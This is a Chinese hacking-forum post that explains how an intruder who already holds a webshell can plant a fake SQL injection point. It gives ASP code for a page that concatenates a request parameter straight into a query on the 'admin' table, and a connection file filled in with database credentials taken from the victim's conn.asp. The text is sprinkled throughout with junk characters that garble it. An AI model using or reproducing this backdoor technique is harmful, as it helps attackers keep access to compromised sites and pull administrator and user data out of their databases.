自己构造注入点方便入侵. ]8 G$ o0 \# \7 F% w4 o4 I' V
7 d1 P, Z" x1 J" I
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
: J* z8 U9 ?8 l6 H& F2 W) e
- Y( T J. R8 Y7 Q! V3 s5 ^; ^这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!; a1 d# [! O- z5 M
( t+ V1 P$ @. s$ K( Z6 E% t
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
, T2 S1 b" Y) ^) u& \* k Z/ B! O4 S7 O8 u- L8 s1 ~5 g
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表5 p# e1 i/ z" ?& J. @% z) ^/ I
* b0 a/ t, v, D
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:. q( ]2 }4 T; P! m7 S M. ]
5 | C. p8 P5 e# N程序代码
3 g7 l' S8 g e! B h" ^, a<!--#include file="xx.asp"-->& l# z& i( s. ]/ Q: C: t" V3 O- E, t3 U0 V
<%
/ Y0 L( R0 B p# ^: v# Xset rs=server.createobject("ADODB.recordset"). A% y4 g) T9 y I" i) T7 `% x
id = request("id")! {4 @* d! e% z; {% C5 g1 t
strSQL = "select * from admin where id=" & id4 S& f3 K8 u/ `6 G% K7 f
rs.open strSQL,conn,1,3
/ b, R W: Q7 H8 E' q$ f$ ~4 p4 zrs.close
( X" s7 K3 }3 Y, _' w8 q1 C- N+ N%>5 w2 t: @3 v2 j1 X7 B
5 U1 g% _; H$ l: [6 c把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
' f+ @' m- m) C: h8 `( I! T, U: r6 V/ F2 r& `2 _/ | W
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
v5 @! ^8 i0 G2 i% f% d( h6 @" |% _
然后就要构造一个连接数据库的文件了,代码如下:3 i+ h5 L& a: A8 G& G
程序代码3 ?0 V# R5 X6 M$ O* N- G
<%
, m. T4 \9 A& `. Z* _, t7 bstrSQLServerName = "000.000.000.000" '服务器名称或地址
: x" R: T8 i& @8 r, j, jstrSQLDBUserName = "sqlname" '数据库帐号 K: v z+ N* }! Z
strSQLDBPassword = "sqlpass" '数据库密码8 H6 ~% h9 A! R4 L1 l% H
strSQLDBName = "sqldataname" '数据库名称
" G7 F( ?( y" g" ASet conn = Server.CreateObject("ADODB.Connection")
, W3 I2 o& S2 O# y' i3 x* v; bstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"5 F3 ~5 X* w+ h" ~+ P9 G0 P4 r9 w4 |2 d
conn.open strCon' l N: i4 _4 i; u. f& `' c$ ? i
%>1 z1 P% c0 [7 C( @0 k
5 Q( l/ j+ i; y0 P2 n0 y! F这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
( ?! I7 |' Z: `6 y3 F2 T- B
6 E6 X" E8 @! w" K( D% ]5 M% G) n就这样,正常情况下,就OK了,伪造成功……
1 `/ ^ L0 [5 r5 e, a
( B# B7 l3 Q% P2 d8 ?0 C 如果有什么问题可以提出来大家一起探讨解决。 |